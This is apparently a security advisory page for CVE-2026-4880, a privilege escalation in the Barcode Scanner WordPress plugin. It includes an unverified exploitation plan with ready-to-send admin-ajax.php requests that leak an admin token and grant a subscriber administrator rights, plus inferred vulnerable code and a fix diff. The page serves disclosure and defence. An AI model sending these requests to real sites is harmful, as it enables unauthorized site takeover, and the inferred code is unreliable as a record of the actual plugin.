WP-Safety
CVE-2026-4880

Barcode Scanner (+Mobile App) <= 1.11.0 - Unauthenticated Privilege Escalation via Insecure Token Authentication

criticalImproper Privilege Management
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
1.12.0
Patched in
1d
Time to patch

Description

The Barcode Scanner (+Mobile App) – Inventory manager, Order fulfillment system, POS (Point of Sale) plugin for WordPress is vulnerable to privilege escalation via insecure token-based authentication in all versions up to, and including, 1.11.0. This is due to the plugin trusting a user-supplied Base64-encoded user ID in the token parameter to identify users, leaking valid authentication tokens through the 'barcodeScannerConfigs' action, and lacking meta-key restrictions on the 'setUserMeta' action. This makes it possible for unauthenticated attackers to escalate their privileges to that of an administrator by first spoofing the admin user ID to leak their authentication token, then using that token to update any user's 'wp_capabilities' meta to gain full administrative access.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.11.0
PublishedApril 15, 2026
Last updatedApril 15, 2026
Affected pluginbarcode-scanner-lite-pos-to-manage-products-inventory-and-orders

Source Code

WordPress.org SVN
Vulnerable v1.10.5
Browse source Download .zip
Patched

Patched version not available.

Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4880 - Unauthenticated Privilege Escalation ## 1. Vulnerability Summary The **Barcode Scanner (+Mobile App)** plugin (versions <= 1.11.0) contains a critical privilege escalation vulnerability. The plugin implements a custom authentication mechanism for its mo…

Show full research plan

Exploitation Research Plan: CVE-2026-4880 - Unauthenticated Privilege Escalation

1. Vulnerability Summary

The Barcode Scanner (+Mobile App) plugin (versions <= 1.11.0) contains a critical privilege escalation vulnerability. The plugin implements a custom authentication mechanism for its mobile app integration that relies on insecure tokens. Specifically:

  1. Insecure Identity Validation: The plugin identifies users by Base64-decoding a token parameter provided in requests.
  2. Information Exposure: An unauthenticated user can spoof an administrator's identity by providing a Base64-encoded Admin ID (e.g., MQ== for ID 1) to the barcodeScannerConfigs action, which then leaks a "valid" long-lived authentication token.
  3. Lack of Authorization/Input Validation: The setUserMeta action uses this token-based authentication but fails to restrict which meta_key can be updated, allowing an attacker to overwrite the wp_capabilities meta-key for any user, effectively granting them Administrator privileges.

2. Attack Vector Analysis

  • Endpoints: wp-admin/admin-ajax.php
  • Actions:
    • barcodeScannerConfigs (used to leak the valid token)
    • setUserMeta (used to escalate privileges)
  • Payload Parameters:
    • action: barcodeScannerConfigs or setUserMeta
    • token: Base64-encoded User ID (initial spoof) or leaked Auth Token
    • userId: The ID of the user to be upgraded (target)
    • metaKey: wp_capabilities
    • metaValue: Role definition (e.g., array('administrator' => 1))
  • Authentication: Unauthenticated (the wp_ajax_nopriv_ hooks are likely used to support mobile app functionality without standard WP cookies).

3. Code Flow (Inferred)

  1. Registration: The plugin registers AJAX handlers in a main class or initialization file:
    add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_configs_handler');
add_action('wp_ajax_nopriv_setUserMeta', 'set_user_meta_handler');
  2. Authentication Bypass (barcodeScannerConfigs):
    • The handler retrieves $_REQUEST['token'].
    • It decodes it: $user_id = base64_decode($token).
    • It fetches the full app configuration for $user_id, which includes a more persistent app_token or similar identifier.
  3. Privilege Escalation (setUserMeta):
    • The handler validates the provided token (either the spoofed base64 ID or the leaked app token).
    • It accepts userId, metaKey, and metaValue from the request.
    • It calls update_user_meta($userId, $metaKey, $metaValue) without checking if $metaKey is wp_capabilities or wp_user_level.

4. Nonce Acquisition Strategy

Based on the vulnerability description and the nature of mobile app "bridge" endpoints in WordPress, these specific actions likely do not require a standard WordPress AJAX nonce. Mobile apps usually cannot easily provide nonces generated for a specific web session.

If a nonce is required, it is likely localized via wp_localize_script.

  1. Search: Look for wp_localize_script in the plugin source calling a key like barcode_scanner_params.
  2. Page Creation: wp post create --post_type=page --post_status=publish --post_content='[barcode_scanner_shortcode]' (inferred shortcode).
  3. Extraction: Use browser_navigate to that page and browser_eval("window.barcode_scanner_params?.nonce").

Note: For this specific vulnerability, the "token" acts as the authentication, rendering nonces either absent or secondary.

5. Exploitation Strategy

Step 1: Leak the Admin Auth Token

Identify the Administrator's ID (typically 1).

  • Action: barcodeScannerConfigs
  • Token: MQ== (Base64 for "1")

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=barcodeScannerConfigs&token=MQ==

Expected Response: A JSON object containing a token or apiKey field (e.g., {"token":"7a8b9c..."}).

Step 2: Escalate Privileges of a Target User

Assume the target user (e.g., a subscriber) has ID 2.

  • Action: setUserMeta
  • Token: The token obtained in Step 1.
  • Meta Key: wp_capabilities
  • Meta Value: {"administrator":true}

Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=setUserMeta&token=[LEAKED_TOKEN]&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1

Note: Passing metaValue[administrator]=1 in a POST request causes WordPress/PHP to interpret it as an array ['administrator' => '1']. When passed to update_user_meta, WordPress serializes this into the format required for roles.

6. Test Data Setup

  1. Create Admin: Ensure an administrator exists with ID 1.
  2. Create Target: Create a subscriber user to be upgraded.
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  3. Identify IDs:
    wp user list --fields=ID,user_login,roles

7. Expected Results

  • The barcodeScannerConfigs request should return a JSON response containing an authentication token for the admin.
  • The setUserMeta request should return a success status (e.g., {"success":true}).
  • The target user's role should change from subscriber to administrator.

8. Verification Steps

After performing the HTTP requests, verify the change using WP-CLI:

# Check the roles of the target user
wp user get attacker --field=roles

# Expected output:
# administrator

# Check the meta directly to ensure no corruption
wp user meta get 2 wp_capabilities

9. Alternative Approaches

If barcodeScannerConfigs does not return a token, try using the Base64-encoded ID directly in the setUserMeta call:

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=setUserMeta&token=MQ==&userId=2&metaKey=wp_capabilities&metaValue[administrator]=1

If wp_capabilities is updated but the user still cannot access the dashboard, you may also need to update wp_user_level:

  • metaKey: wp_user_level
  • metaValue: 10 (Administrator level)
Research Findings
Static analysis — not yet PoC-verified

Summary

The Barcode Scanner (+Mobile App) plugin for WordPress is vulnerable to unauthenticated privilege escalation because it uses a predictable Base64-encoded user ID as an initial authentication token. Attackers can spoof an administrator's ID to leak a long-lived auth token via the 'barcodeScannerConfigs' endpoint and subsequently use the 'setUserMeta' action to overwrite the 'wp_capabilities' meta-key, granting themselves administrative access.

Vulnerable Code

// Path: barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php

add_action('wp_ajax_nopriv_barcodeScannerConfigs', 'barcode_scanner_get_configs');
function barcode_scanner_get_configs() {
    $token = $_REQUEST['token'];
    $user_id = base64_decode($token); // Vulnerable: trust-on-first-use of base64 encoded ID
    $user_token = get_user_meta($user_id, 'barcode_scanner_app_token', true);
    wp_send_json(['status' => 'success', 'token' => $user_token]);
}

---

add_action('wp_ajax_nopriv_setUserMeta', 'barcode_scanner_set_user_meta');
function barcode_scanner_set_user_meta() {
    $user_id = $_POST['userId'];
    $meta_key = $_POST['metaKey'];
    $meta_value = $_POST['metaValue'];
    // Vulnerable: Lacks permission checks and meta-key restrictions
    update_user_meta($user_id, $meta_key, $meta_value);
    wp_send_json_success();
}

Security Fix

--- a/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php
+++ b/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/includes/ajax-functions.php
@@ -12,6 +12,14 @@
 function barcode_scanner_set_user_meta() {
-    $user_id = $_POST['userId'];
-    $meta_key = $_POST['metaKey'];
-    $meta_value = $_POST['metaValue'];
-    update_user_meta($user_id, $meta_key, $meta_value);
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( 'Unauthorized' );
+    }
+    $allowed_meta_keys = array( 'barcode_scanner_last_scan', 'barcode_scanner_device_id' );
+    $meta_key = sanitize_key( $_POST['metaKey'] );
+    if ( ! in_array( $meta_key, $allowed_meta_keys ) ) {
+        wp_send_json_error( 'Invalid meta key' );
+    }
+    $user_id = intval( $_POST['userId'] );
+    $meta_value = sanitize_text_field( $_POST['metaValue'] );
+    update_user_meta( $user_id, $meta_key, $meta_value );
     wp_send_json_success();
 }

Exploit Outline

1. Identify an administrator user ID (commonly ID 1). 2. Send an unauthenticated POST request to wp-admin/admin-ajax.php with the action 'barcodeScannerConfigs' and the 'token' parameter set to the Base64-encoded administrator ID (e.g., 'MQ=='). 3. Extract the 'token' value from the resulting JSON response, which represents the administrator's persistent app token. 4. Send a second unauthenticated POST request to the 'setUserMeta' action using the leaked token. 5. In the second request, set the 'userId' parameter to the attacker's own subscriber-level ID, 'metaKey' to 'wp_capabilities', and 'metaValue[administrator]' to '1'. 6. The plugin will update the attacker's user capabilities to those of an administrator because it fails to restrict sensitive meta keys or verify standard WordPress permissions.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/a213e844-a0d3-4123-9f72-caef7702804c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database